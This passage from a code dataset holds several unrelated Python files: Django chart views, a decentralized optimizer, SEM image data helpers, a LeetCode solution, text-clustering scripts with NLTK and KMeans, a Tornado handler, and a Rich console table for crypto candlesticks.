{\"logs\": logs,\n \"period\": period})\n\n#@access_required\ndef system_mon(request):\n return render_to_response(\"misc/system_mon.django.html\", {\"disk_info\": fs_space()})\n\n\ndef user_agents_statistics(lines):\n surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 400, 400)\n data = [(line[0], [[0, line[1]]]) for line in lines]\n options = {\n 'background': {\n 'hide': True,\n },\n 'legend': {\n 'hide': True,\n },\n 'padding': {\n 'left': 70,\n 'right': 10,\n 'top': 0,\n 'bottom': 0,\n },\n\n }\n chart = pycha.pie.PieChart(surface, options)\n chart.addDataset(data)\n chart.render()\n name = gen_random_str(5)\n surface.write_to_png(PIE_PATH % name)\n render_to_task(\"rm -f %s\" % (PIE_PATH % name), \"now+5minutes\")\n return \"/media/stat/%s.png\" % name\n","sub_path":"misc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522680354","text":"#!/usr/bin/env python\n# coding=utf-8\nimport numpy as np\n\nfrom .decentralized_optimizer import DecentralizedOptimizer\n\nclass DGD_tracking(DecentralizedOptimizer):\n '''The distributed gradient descent algorithm with gradient tracking, described in 'Harnessing Smoothness to Accelerate Distributed Optimization', Guannan Qu, Na Li'''\n\n def __init__(self, p, eta=0.1, **kwargs):\n super().__init__(p, **kwargs)\n self.eta = eta\n self.grad_last = None\n\n\n def init(self):\n super().init()\n self.s = np.zeros((self.p.dim, self.p.n_agent))\n for i in range(self.p.n_agent):\n self.s[:, i] = self.grad(self.x[:, i], i)\n\n self.grad_last = self.s.copy()\n\n\n def update(self):\n self.n_comm[self.t] += 1\n\n x_last = self.x.copy()\n y = self.x.dot(self.W)\n self.x = y - self.eta * self.s\n\n self.s = self.s.dot(self.W_s)\n # for i in range(self.p.n_agent):\n # self.s[:, i] += self.grad(self.x[:, i], i) - self.p.grad(x_last[:, i], i) # Don't count the last gradient evaluation!\n self.s -= self.grad_last\n for i in range(self.p.n_agent):\n self.grad_last[:, i] = self.grad(self.x[:, i], i)\n self.s += self.grad_last\n \n","sub_path":"optimizers/decentralized_distributed/DGD_tracking.py","file_name":"DGD_tracking.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"403055916","text":"import numpy as np\nimport pandas as pd\nimport math\nimport re\nfrom PIL import Image\n\n\ndef img_info(fname, fields):\n '''\n Gets condensed SEM image name and info\n Inputs : fname (str, SEM image filename)\n fields (list of strings for data categories or \"default\")\n Outputs : info_dict (dictionary of from filename)\n '''\n #\n if fields == \"default\":\n fields = [\"Material\", \"Magnification\", \"Resolution\", \"HFW\",\n \"StartingMaterial\", \"CalcinationTemp\", \"CalcinationTime\",\n \"AgingTime\", \"AgingTemp\", \"AgingHumidity\", \"AgingOxygen\",\n \"Impurity\", \"ImpurityConcentration\", \"Detector\",\n \"Coating\", \"Replicate\", \"Particle\", \"Image\", \"AcquisitionDate\"]\n # Fill dictionary from filename and data fields\n info_dict = {}\n info = re.split('_', fname)\n # Correctly labeled images\n if (len(info) == len(fields)):\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = info[i]\n # Alpha and UO3 split by underscore\n elif (len(info) == len(fields)+1) and (info[0]=='Alpha'):\n info[0] = info[0] + '-' + info[1]\n info.remove(info[1])\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = info[i]\n # Am and UO3 split by underscore\n elif (len(info) == len(fields)+1) and (info[0]=='Am'):\n info[0] = info[0] + '-' + info[1]\n info.remove(info[1])\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = info[i]\n # Single missing field\n elif (len(info) == len(fields)-1):\n info.append('NA')\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = info[i]\n # Date split by underscore or voltage included\n elif (len(info) > len(fields)) and (info[0]!='Alpha') and (info[0]!='Am'):\n info = info[0:19]\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = info[i]\n # No exception found\n else:\n print(fname, 'does not contain enough fields')\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = 'x'\n # \n info_dict['Image'] = info_dict['Image'][0:3]\n info_dict['FileName'] = fname\n # Return image id and info as dictionary\n return info_dict\n\n\ndef convert_fname(fname, fields):\n '''\n Converts project 1 filenames to other scheme\n '''\n # Fill dictionary from filename and data fields\n idict = {}\n info = re.split('_', fname)\n for i in range(0, len(fields)-1):\n idict[fields[i]] = info[i]\n # Get HFW from magnification\n if idict['Magnification'] == '10000x':\n hfw = '30.6um'\n elif idict['Magnification'] == '25000x':\n hfw = '12.3um'\n elif idict['Magnification'] == '50000x':\n hfw = '6.13um'\n elif idict['Magnification'] == '100000x':\n hfw = '3.06um'\n else:\n hfw = 'NA'\n # Create new filename\n new_fname = idict['Material'] + '_' + idict['Magnification'] + '_'\n new_fname += '1024x934_' + hfw + '_' + idict['Precipitate'] + '_'\n new_fname += idict['CalcinationTemp'] + '_' + idict['CalcinationTime'] + '_'\n new_fname += 'NA_NA_NA_NA_'\n new_fname += idict['Ore'] + '-' + idict['Leach'] + '-' + idict['Purification']\n new_fname += '_NA_TLD_NoCoat_' + idict['Replicate'][-1] + '_' + idict['Particle'][-1] + '_'\n new_fname += idict['Image'][0:3] + '_' + 'NA.tif'\n # Return image id and info as dictionary\n return new_fname\n\n\ndef quick_filter(df, filt_dict):\n '''\n Returns filtered dataframe from info in dictionary\n Inputs : df (pd DataFrame)\n filt_dict (dict['key']=[list, of, valid, values])\n Outputs : filt_df\n '''\n new_df = df\n for key in filt_dict:\n new_df = new_df[new_df[key]==filt_dict[key]]\n return new_df\n\n\ndef json2df(dpath, dfiles):\n '''\n Returns filtered dataframe from info in dictionary\n Inputs : dpath (str, path to datafiles)\n dfiles (list of filenames to import)\n Outputs : concatenated dataframes\n '''\n df_list = []\n for item in dfiles:\n fname = dpath + '/' + item\n temp_df = pd.read_json(fname, orient='index', dtype=True)\n df_list.append(temp_df)\n return pd.concat(df_list)\n\n\ndef split_dataset(dataframe, test_split, k, seed):\n '''\n Splits dataset into test, train, and cross val. sets\n Inputs: dataframe: df of split image names, labels\n test_split: size of test set (float 0 to 1)\n k: number of cv folds (integer)\n Outputs: test_df: df of all test ids, labels\n train_df: df of all train ids, labels \n cv_df: train_df w/ fold labels added\n Usage: te_df, tr_df, cv_df = split_dataset(all_ df, 0.2, 5, 42)\n '''\n # Split parent df, create train/test dfs\n train_df = dataframe.sample(frac=(1-test_split), random_state=seed)\n test_df = dataframe.drop(train_df.index)\n # Copy and shuffle train_df, reset indexes\n cv_df = train_df.sample(frac=1, random_state=seed)\n df_len = len(cv_df)\n # Create k=cv_folds cross validation sets\n val_list = [0] * df_len\n for fold in list(range(k)):\n idx1 = int(fold * df_len / k)\n idx2 = idx1 + int(df_len / k)\n for idx in range(idx1, idx2):\n val_list[idx] = fold\n cv_df['fold'] = val_list\n return test_df, train_df, cv_df\n\n\ndef stratified_split(df, label_col, test_split, balance, k, seed):\n '''\n Stratified train/test split with oversampled training data\n Inputs: df: dataframe of split image names, labels\n label_col : column of dataframe (str)\n test_split: size of test set (float 0 to 1)\n balance: training data imbalance (float 0 to 1)\n (# in each class / # largest class)\n k: number of cv folds (integer)\n seed : random state (integer)\n Outputs: test_df: df of all test ids, labels\n train_df: df of all train ids, labels \n cv_df: train_df w/ fold labels added\n Usage: te_df, tr_df, cv_df = stratified_split(df, 0.2, 0.8, 5, 42)\n '''\n # Stratified test split\n test_dfs = []\n for label in df[label_col].unique():\n temp_df = df[df[label_col]==label]\n test_dfs.append(temp_df.sample(frac=test_split,random_state=seed))\n test_df = pd.concat(test_dfs)\n test_df = test_df.sample(frac=1.0,random_state=seed)\n # Remove test images from df, leaving unique training images\n utrain_df = df.drop(test_df.index)\n # Create k stratified cross validation sets\n cv_dfs = []\n for fold in list(range(k)):\n label_dfs = []\n for label in df[label_col].unique():\n temp_df = utrain_df[utrain_df[label_col]==label]\n n_label = len(temp_df)\n n_sample = int(n_label / (k-fold))\n label_dfs.append(temp_df.sample(n=n_sample,random_state=seed))\n fold_df = pd.concat(label_dfs)\n utrain_df = utrain_df.drop(fold_df.index)\n fold_df['fold'] = fold\n cv_dfs.append(fold_df)\n cv_df = pd.concat(cv_dfs)\n # Oversample each fold, join\n oversampled_dfs = []\n for fold in list(range(k)):\n fold_df = cv_df[cv_df['fold']==fold]\n new_fold_df = oversample(fold_df, label_col, balance)\n new_fold_df = new_fold_df.sample(frac=1.0,random_state=seed)\n oversampled_dfs.append(new_fold_df)\n new_cv_df = pd.concat(oversampled_dfs)\n train_df = new_cv_df.drop(columns=['fold'])\n return test_df, train_df, new_cv_df\n\n\ndef oversample(df, label_col, balance):\n '''\n Oversamples df entries for balances datasets\n '''\n labels = df[label_col].unique()\n n_max = df[label_col].value_counts()[0]\n label_dfs = []\n for label in labels:\n temp_df = df[df[label_col]==label]\n n_label = len(temp_df)\n # While class is unbalanced, sample and concat\n while (n_label <= balance*n_max):\n samp_df = temp_df.sample(n=1)\n temp_df = pd.concat([temp_df, samp_df])\n n_label = len(temp_df)\n label_dfs.append(temp_df)\n # Join the oversampled dfs for each label\n balanced_df = pd.concat(label_dfs)\n return balanced_df\n\n\ndef drop_images(df, fname_col, img_path):\n '''\n Drops unreadable images from dataframe\n '''\n bad_imgs = []\n for idx in df.index:\n fname = img_path + '/' + df.loc[idx][fname_col]\n try:\n _img = Image.open(fname)\n except:\n bad_imgs.append(idx)\n print(idx, df.loc[idx][fname_col], 'dropped from df')\n return df.drop(bad_imgs)\n\n\ndef shannon_entropy(pred_list):\n '''\n Returns Shannon entropy (base 2) for set of predictions in bits\n '''\n entropy = 0.0\n for pred in pred_list:\n if pred > 0.0:\n entropy -= pred * np.log2(pred)\n else:\n entropy += 0.0\n return entropy\n\n\ndef kl_divergence(exp_dist, pred_dist):\n '''\n Returns Kullback-Leibler (KL) Divergence for set of predictions in bits\n Inputs : exp_dist (list of floats, UOC mixture fractions ground truth, P)\n pred_dist (list of floats, predicted CNN softmax scores, Q)\n '''\n dkl = 0.0\n for i in range(0,len(pred_dist)):\n if (pred_dist[i] > 0.0) and (exp_dist[i] > 0.0):\n dkl += exp_dist[i] * np.log2(exp_dist[i]/pred_dist[i])\n else:\n dkl += 0.0\n return dkl\n\n\ndef series2list(pred_series, n_classes):\n '''\n Encodes softmax scores for entropy or KL divergence calculation\n Inputs : pred_series (pandas series from prediction df)\n n_classes (number of classes, int 5 or 16)\n Outputs : pred_list (list of n_classes softmax scores)\n '''\n # Get correct label set\n if n_classes == 5:\n label_set = [\"ADU\", \"AUC\", \"MDU\", \"SDU\", \"UO4\"]\n elif n_classes == 16:\n label_set = ['ADU-U3O8','ADU-UO2','ADU-UO3','AUC-U3O8','AUC-UO3',\\\n 'AUCd-UO2','AUCi-UO2','MDU-U3O8','MDU-UO2','MDU-UO3',\\\n 'SDU-U3O8','SDU-UO2','SDU-UO3','UO4-U3O8','UO4-UO2','UO4-UO3']\n else:\n print(\"Invalid number of classes\")\n return []\n # Fill list with predictions\n pred_list = []\n for item in label_set:\n col_name = item + \"_prob\"\n pred_list.append(pred_series[col_name])\n return pred_list\n\n\ndef get_hfw(fname):\n '''\n Returns image horizontal field width (in um) from file name\n '''\n hfw_str = img_info(fname=fname, fields=\"default\")['HFW']\n try:\n # Assume HFW in microns is w/o units\n hfw_num = np.float(hfw_str)\n except:\n if \"um\" in hfw_str:\n # If HFW has \"um\" at end\n hfw_num = np.float(hfw_str[:-2])\n elif \"mm\" in hfw_str:\n # If HFW has \"mm\" at end\n hfw_num = np.float(hfw_str[:-2])*1000.0\n elif (\"HFW\" in hfw_str) and (\"pt\" in hfw_str):\n # If HFW uses \"HFWxptx\" notation\n hfw_str = hfw_str.split('HFW')[1].split('pt')\n hfw_num = np.float(hfw_str[0] + \".\" + hfw_str[1])\n else:\n # If nothing can be done with HFW field\n hfw_num = \"NA\"\n # return value\n return hfw_num\n\n\ndef get_scalebar(full_hfw, full_width, sub_width):\n '''\n Returns scalebar size for SEM images\n '''\n # Calculate pixels per micron\n bar_px = full_width / full_hfw\n bar_scale = 1.0\n # Set dimensions of scalebar\n ii = 0\n while (int(bar_px) > 0.9*sub_width) and (ii < 20):\n bar_px = bar_px / 2\n bar_scale = bar_scale / 2\n ii += 1\n # Convert from um to nm if necessary\n if bar_scale < 1.0:\n bar_scale = np.int(bar_scale * 1000.0)\n units = \"nm\"\n else:\n units = \"um\"\n return int(bar_px), np.round(bar_scale,2), units\n\n\ndef convert_labels2sm(dpath, old_fname, new_fname, savefile):\n '''\n Converts Part 3 labels (StartingMaterial-Material) to SM only\n '''\n print(old_fname, \"->\", new_fname)\n # Change label to SM\n old_df = pd.read_csv(dpath+\"\\\\\"+old_fname, index_col='Img_ID')\n print(\"Old classes: \", old_df['label'].unique())\n old_df['label'] = old_df['StartingMaterial']\n # Standardize labels\n old_df = old_df.replace(['UO2(HNO3)2','UO4-2H2O'], 'UO4')\n old_df = old_df.replace(['AUCi','AUCd'], 'AUC')\n #\n new_df = old_df\n print(\"New classes: \", new_df['label'].unique())\n #\n if savefile is True:\n new_df.to_csv(dpath+\"\\\\\"+new_fname, index='Img_ID')\n return new_df\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":12423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422476246","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def swapNodes(self, head: ListNode, k: int) -> ListNode:\n listLength, frontNode, endNode, currentNode = 0, None, None, head\n while currentNode != None:\n listLength += 1\n if endNode != None:\n endNode = endNode.next\n if listLength == k:\n frontNode = currentNode\n endNode = head\n currentNode = currentNode.next\n frontNode.val, endNode.val = endNode.val, frontNode.val\n return head","sub_path":"LeetCode/March Leetcoding Challenge/Swapping Nodes in a Linked List.py","file_name":"Swapping Nodes in a Linked List.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"68898019","text":"\nfrom __future__ import print_function\nimport numpy as np\nimport pandas as pd\nimport nltk\nimport re\nimport os\nimport codecs\nfrom sklearn import feature_extraction\nimport mpld3\nfrom nltk.stem.snowball import SnowballStemmer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.cluster import KMeans\nfrom sklearn.externals import joblib\n\ndef tokenize_and_stem(text):\n # first tokenize by sentence, then by word to ensure that punctuation is caught as it's own token\n tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search('[a-zA-Z]', token):\n filtered_tokens.append(token)\n stems = [stemmer.stem(t) for t in filtered_tokens]\n return stems\n\n\ndef tokenize_only(text):\n # first tokenize by sentence, then by word to ensure that punctuation is caught as it's own token\n tokens = [word.lower() for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search('[a-zA-Z]', token):\n filtered_tokens.append(token)\n return filtered_tokens\n\nstopwords = nltk.corpus.stopwords.words('english')\nprint(stopwords[:10])\nstemmer = SnowballStemmer(\"english\")\n#not super pythonic, no, not at all.\n#use extend so it's a big flat list of vocab\ntotalvocab_stemmed = []\ntotalvocab_tokenized = []\nsynopses=[]\nsynopsis=\"\"\nfor line in open('/home/nchu-csie/hsiang_project/Cluster/synopses_list_imdb.txt'):\n\tline=line.rstrip('\\n') \n\tif line == \" BREAKS HERE\":\n\t\tsynopses.append(synopsis)\n\t\tsynopsis=\"\"\n\telif line not in ['\\n', '\\r\\n']:\n\t\tsynopsis+=line\ncnt=0\nfor line in open('/home/nchu-csie/hsiang_project/Cluster/synopses_list_wiki.txt'):\n\tline=line.rstrip('\\n') \n\tif \"BREAKS HERE\" in line:\n\t\tsynopses[cnt]+=synopsis\n\t\tsynopsis=\"\"\n\t\tcnt+=1\n\telif line not in ['\\n', '\\r\\n'] and \"Plot [edit] [ [ edit edit ] ]\" not in line:\n\t\tsynopsis+=line\nfor i in synopses:\n allwords_stemmed = tokenize_and_stem(i.decode('utf8')) #for each item in 'synopses', tokenize/stem\n totalvocab_stemmed.extend(allwords_stemmed) #extend the 'totalvocab_stemmed' list\n \n allwords_tokenized = tokenize_only(i.decode('utf8'))\n totalvocab_tokenized.extend(allwords_tokenized)\n\nvocab_frame = pd.DataFrame({'words': totalvocab_tokenized}, index = totalvocab_stemmed)\nprint ('there are ' + str(vocab_frame.shape[0]) + ' items in vocab_frame')\nprint (vocab_frame.head())\n\n#define vectorizer parameters\ntfidf_vectorizer = TfidfVectorizer(max_df=0.8, max_features=200000,\n min_df=0.2, stop_words='english',\n use_idf=True, tokenizer=tokenize_and_stem, ngram_range=(1,3))\n\ntfidf_matrix = tfidf_vectorizer.fit_transform(synopses) #fit the vectorizer to synopses\nprint(tfidf_matrix.shape)\n\nterms = tfidf_vectorizer.get_feature_names()\ndist = 1 - cosine_similarity(tfidf_matrix)\n\nnum_clusters = 5\nkm = KMeans(n_clusters=num_clusters)\nkm.fit(tfidf_matrix)\nclusters = km.labels_.tolist()\nprint(km)\n\njoblib.dump(km, 'doc_cluster.pkl')\nkm = joblib.load('doc_cluster.pkl')\nclusters = km.labels_.tolist()\ntitles=[]\ntitles = [line.rstrip('\\n') for line in open('/home/nchu-csie/hsiang_project/Cluster/title_list.txt')]\nranks = [line for line in range(1,101)] \ngenres=[]\ngenres = [line.rstrip('\\n') for line in open('/home/nchu-csie/hsiang_project/Cluster/title_list.txt')]\nfilms = { 'title': titles, 'rank': ranks, 'synopsis': synopses, 'cluster': clusters, 'genre': genres }\n\nframe = pd.DataFrame(films, index = [clusters] , columns = ['rank', 'title', 'cluster', 'genre'])\nframe['cluster'].value_counts() #number of films per cluster (clusters from 0 to 4)\nprint(frame['cluster'].value_counts()) #number of films per cluster (clusters from 0 to 4)\n\ngrouped = frame['rank'].groupby(frame['cluster']) #groupby cluster for aggregation purposes\ngrouped.mean() #average rank (1 to 100) per cluster\nprint (grouped.mean())\n\nprint(\"Top terms per cluster:\")\nprint()\n#sort cluster centers by proximity to centroid\norder_centroids = km.cluster_centers_.argsort()[:, ::-1] \n\nfor i in range(num_clusters):\n print(\"Cluster %d words:\" % i, end='')\n \n for ind in order_centroids[i, :6]: #replace 6 with n words per cluster\n print(' %s' % vocab_frame.ix[terms[ind].split(' ')].values.tolist()[0][0].encode('utf-8', 'ignore'), end=',')\n print() #add whitespace\n print() #add whitespace\n \n print(\"Cluster %d titles:\" % i, end='')\n for title in frame.ix[i]['title'].values.tolist():\n print(' %s,' % title, end='')\n print() #add whitespace\n print() #add whitespace\n \nprint()\nprint()\n","sub_path":"Cluster/stopwords.py","file_name":"stopwords.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"278113828","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport json\nimport tornado.web\nfrom modules.input.tcp_udp_plugin_manage import TcpUdpPluginManage\n\nerrmsg = {}\n\n\nclass TcpUdpListHandler(tornado.web.RequestHandler):\n \"\"\"\n \"\"\"\n def get(self):\n \"\"\"\n \"\"\"\n try:\n start = int(self.request.query_arguments['start'][0])\n limit = int(self.request.query_arguments['limit'][0])\n result = TcpUdpPluginManage.list(start, limit)\n\n if result:\n self.write(json.dumps(result))\n else:\n self.set_status(404)\n except Exception as ex:\n errmsg['message'] = str(ex)\n self.write(errmsg)\n self.set_status(500)\n","sub_path":"docker/container_install_script/docker-container-installer/anyrobot/etl/etl_server/handlers/input/tcp_udp/list_handler.py","file_name":"list_handler.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560984187","text":"# -*- coding: utf-8 -*-\n\"\"\"Display data in the CLI using Rich.\"\"\"\nfrom typing import List, Union\n\nimport pandas as pd\nfrom rich import box\nfrom rich.live import Live\nfrom rich.table import Table\n\nCandles = List[List[List[Union[int, float]]]]\n\n\ndef setup_table() -> Table:\n \"\"\"Create Rich table layout.\n\n Returns:\n Table: Include desired description and columns.\n \"\"\"\n table = Table(\n show_header=True,\n caption=caption(),\n box=box.MINIMAL_HEAVY_HEAD,\n header_style='bold #ffff00',\n title='CRYPTO CANDLESTICKS',\n title_style='bold #54ff00 underline',\n show_lines=True,\n safe_box=True,\n expand=True,\n )\n\n table.add_column('OPEN', justify='center', no_wrap=True)\n table.add_column('CLOSE', justify='center', no_wrap=True)\n table.add_column('HIGH', justify='center', no_wrap=True)\n table.add_column('LOW', justify='center', no_wrap=True)\n table.add_column('VOLUME', justify='center', no_wrap=True)\n table.add_column('TICKER', justify='center', no_wrap=True)\n table.add_column('INTERVAL', justify='center', no_wrap=True)\n table.add_column('TIME', justify='center', no_wrap=True)\n\n return table\n\n\ndef write_to_column(\n ticker: str,\n interval: str,\n data_downloaded: Candles,\n live: Live,\n) -> Table:\n \"\"\"Write data to console.\n\n Args:\n ticker (str): Quote + base currency.\n interval (str): Candlestick interval.\n data_downloaded (Candles): Response from the exchange.\n live (Live): Context manager.\n\n Returns:\n Table: Updated table to be rendered.\n \"\"\"\n table = setup_table()\n for row_limit, single_candle in enumerate(data_downloaded[::-1]):\n table.add_row(\n f'[bold white]{single_candle[2]}[/bold white]', # Open\n f'[bold white]{single_candle[1]}[/bold white]', # Close\n f'[bold white]{single_candle[3]}[/bold white]', # High\n f'[bold white]{single_candle[4]}[/bold white]', # Low\n f'[bold white]{single_candle[5]}[/bold white]', # Volume\n f'[bold white]{ticker}[/bold white]',\n f'[bold white]{interval}[/bold white]',\n f\"[bold white]{pd.to_datetime(single_candle[0], unit='ms')}[/bold white]\",\n )\n if row_limit == 15:\n live.update(table)\n break\n live.update(table)\n return table\n\n\ndef caption() -> str:\n \"\"\"Caption to be displayed at the end.\n\n Returns:\n str: Message for the users.\n \"\"\"\n return 'Thank you for using crypto-candlesticks\\\n Consider supporting your developers\\\n ETH: 0x06Acb31587a96808158BdEd07e53668d8ce94cFE\\\n '\n","sub_path":"src/crypto_candlesticks/text_console.py","file_name":"text_console.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"333290320","text":"import numpy as np\nimport random\nimport re\nimport nltk.data\nfrom nltk.corpus import stopwords\nfrom sklearn.cluster import KMeans\n\n#region constants\nURL_REGEX = r'''(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))'''\nEPS = 1e-16\n#endregion\n\n# Summary:\n# Main class for text analysis\n# Contains all methods and algorithms\nclass TextAnalyser(object):\n def __init__(self):\n self._stop_words = stopwords.words('english')\n pass\n\n # Summary:\n # Generates random hexadecimal color\n # params: None\n # return: String | hex color\n def genRandColor(self):\n r = lambda: random.randint(0, 255)\n return '#%02X%02X%02X' % (r(), r(), r())\n\n # Summary:\n # tokenization, removing, unnecessary chars and stopwords\n # params: text String\n # return: text String, text_words list\n def process_text(self, text):\n # remove links\n try:\n pattern = URL_REGEX\n pattern_obj = re.compile(pattern=pattern, flags=re.MULTILINE)\n text = pattern_obj.sub('', text)\n except Exception as ex:\n print(ex.args)\n\n # remove symbols\n text = text.replace(',', ' ') \\\n .replace('.', ' ') \\\n .replace(':', ' ') \\\n .replace('-', ' ') \\\n .replace('_', ' ') \\\n .replace('!', ' ') \\\n .replace('?', ' ') \\\n .replace('\\n', ' ') \\\n .replace(\"'\", '') \\\n .replace('\"', '') \\\n .replace('#', '') \\\n .replace('@', '') \\\n .replace('>', '') \\\n .replace('&', '') \\\n .replace(\"'s\", '') \\\n .replace('^', '') \\\n .replace('|', '') \\\n .lower()\n\n # remove stop words and define corpus\n tmp = text.split(' ')\n text_words = [word for word in tmp if word not in self._stop_words]\n text_words = list(set(text_words))\n text_words.sort()\n text_words.remove('')\n\n return text, text_words\n\n # Summary:\n # counts instances of word in text\n # params: word String, text String\n # return: count Int\n def count_word_in_text(self, word, text):\n count = 0\n if word != None and text != None:\n word = word.lower()\n # use [0] to get only text\n text = self.process_text(text)[0]\n\n count = text.split().count(word)\n return count\n\n # Summary:\n # Uses NLTK to retreive sentences from text\n # process_flag defines if to call process_text() on each sentence\n # params: text String, process_flag Bool\n # return: list\n def get_sentences(self, text, process_flag=False):\n sent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\n sentences = sent_detector.tokenize(text.strip())\n if process_flag:\n # use [0] to get only text\n sentences = [self.process_text(sent)[0] for sent in sentences]\n return sentences\n\n # Summary:\n # applies LSA algorithm on unprocessed text\n # params: text String, var_percent Int\n # return: list> | clusters\n def lsa_on_text(self, text, var_percent=-1):\n m = self.get_text_matrix(text)\n m = np.mat(m)\n #log begin\n # print(m)\n #log end\n\n # SVD decomposition\n T, S, D = np.linalg.svd(m)\n\n # get dim of reconstruction\n variance = 0\n reduced_dim = 0\n if not(1 <= var_percent <= 99):\n for i in range(0, len(S)//2):\n reduced_dim += 1\n variance += 0.5 * (S[i - 1] + S[i])\n else:\n variance_full = S.sum()\n i = 0\n while(var_percent / 100 * variance_full > variance):\n reduced_dim += 1\n variance += 0.5 * (S[i - 1] + S[i])\n i += 1\n\n # get the reconstruction\n svd_reconstruction = T[:, 0:reduced_dim] * np.diag(S[0:reduced_dim]) * D[0:reduced_dim, :]\n # log begin\n # print(reduced_dim)\n # print(svd_reconstruction)\n #log end\n\n # get cos (each to each)\n # get clusters\n rel_matr = []\n for i in range(1, len(m.T)):\n rel_matr.append([])\n for j in range(0, i):\n scalar_prod = m.T[i] * m.T[j].T\n n1 = np.linalg.norm(m.T[i])\n n2 = np.linalg.norm(m.T[j])\n ncos = float(scalar_prod / n1 / n2)\n rel_matr[i - 1].append(ncos)\n\n clusters = self.clusterize(rel_matr, len(m.T), EPS)\n clusters.sort()\n return clusters\n\n # Summary:\n # converts clusters into json result for backend\n # params: clusters list>, text String\n # return list> | json array\n def get_json_result(self, clusters, text):\n result_sentences = self.get_sentences(text, process_flag=False)\n # log begin\n # print('log:clusters:{0}'.format(clusters))\n # log end\n # form array of arrays for sentences of text\n json_result = []\n for cluster in clusters:\n clusterColor = self.genRandColor()\n json_result.append([])\n for index in cluster:\n json_result[clusters.index(cluster)] \\\n .append({\n 'cluster_index': clusters.index(cluster),\n 'text': result_sentences[index - 1],\n 'color': clusterColor\n })\n return json_result\n\n # Summary:\n # generates matrix for word presence in sentences of 'text'\n # params: text String\n # return: list> | text matrix\n def get_text_matrix(self, text):\n sentences = self.get_sentences(text, process_flag=True)\n processed_text, text_words = self.process_text(text)\n # log begin\n # print(processed_text)\n # print(sentences)\n # print(text_words)\n # log end\n # create a matrix\n m = []\n for i in range(len(text_words)):\n m.append([])\n for sent in sentences:\n tmp = self.count_word_in_text(text_words[i], sent)\n m[i].append(tmp)\n return m\n\n # Summary:\n # applies text processing on 'text'\n # and clusteriser sentences into topics\n # params: text String, n_clusters Int\n # return: list> | array of clusters\n def kmeans_on_text(self, text, n_clusters):\n # get vectors\n m = self.get_text_matrix(text)\n X = np.array(m).T\n\n # fit predict\n kmeans = KMeans(n_clusters=n_clusters)\n fit_result = kmeans.fit_predict(X=X)\n\n # clusterize\n clusters = []\n val_set = set(fit_result)\n for el in val_set:\n indices = [i for i, x in enumerate(fit_result) if x == el]\n clusters.append(indices)\n\n # adjust fit_result to lsa clusters result\n clusters = [[i+1 for i in arr] for arr in clusters]\n clusters.sort()\n return clusters\n\n # Summary:\n # compare two lists of clusters\n # params: clusters1 list>, clusters2 list>\n # return: double | percent of correctly clusterised sentenses\n def compare_clusters(self, original, current):\n original = original.copy()\n current = current.copy()\n # sort each\n for cluster in original: cluster.sort()\n for cluster in current: cluster.sort()\n original.sort()\n current.sort()\n\n length = len([el for cluster in original for el in cluster])\n\n anti_counter1 = 0\n for cluster_orig in original:\n for cluster_curr in current:\n if cluster_orig[0] == cluster_curr[0]:\n if len(cluster_orig) == len(cluster_curr):\n for i in range(len(cluster_orig)):\n if cluster_orig[i] != cluster_curr[i]:\n anti_counter1 += 1\n else:\n anti_counter1 += len(cluster_orig)\n for el in cluster_orig:\n for nel in cluster_curr:\n if nel == el:\n anti_counter1 -= 1\n break\n break\n elif cluster_curr == current[-1]:\n anti_counter1 += len(cluster_orig)\n\n # reverse each\n for cluster in original: cluster.reverse()\n for cluster in current: cluster.reverse()\n original.reverse()\n current.reverse()\n\n anti_counter2 = 0\n for cluster_orig in original:\n for cluster_curr in current:\n if cluster_orig[0] == cluster_curr[0]:\n if len(cluster_orig) == len(cluster_curr):\n for i in range(len(cluster_orig)):\n if cluster_orig[i] != cluster_curr[i]:\n anti_counter2 += 1\n else:\n anti_counter2 += len(cluster_orig)\n for el in cluster_orig:\n for nel in cluster_curr:\n if nel == el:\n anti_counter2 -= 1\n break\n break\n elif cluster_curr == current[-1]:\n anti_counter2 += len(cluster_orig)\n\n return 1 - min([anti_counter1,anti_counter2]) / length\n\n # Summary:\n # gets minimum ncos value from vector v1 (column number)\n # to other vectors in the cluster\n # params: v1 Int, rels list, rel_matr Numpy.Matrix\n # return: Float\n def 